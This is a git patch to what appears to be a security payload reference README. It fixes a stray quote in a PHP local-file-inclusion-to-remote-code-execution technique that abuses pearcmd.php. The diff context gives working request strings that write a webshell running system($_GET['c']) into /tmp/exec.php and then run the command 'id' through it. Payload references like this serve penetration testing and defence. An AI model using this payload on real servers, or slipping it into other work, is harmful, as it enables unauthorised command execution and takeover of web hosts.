From 95a85b455d164cc6db624a6da6233d04fa58cf75 Mon Sep 17 00:00:00 2001
From: Str3am <916525768@qq.com>
Date: Wed, 1 Nov 2023 00:35:59 +0800
Subject: [PATCH] Add two methods about LFI to RCE via PHP PEARCMD, and delete
 extra double quotes in method 2 payload

---
 File Inclusion/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 99bf3e8..025f1e8 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -516,7 +516,7 @@ There are this ways to exploit it.
   ```
 * Method 2: man_dir
   ```ps1
-  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+"
+  /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
   /vuln.php?file=/tmp/exec.php&c=id
   ```
   The created configuration file contains the webshell.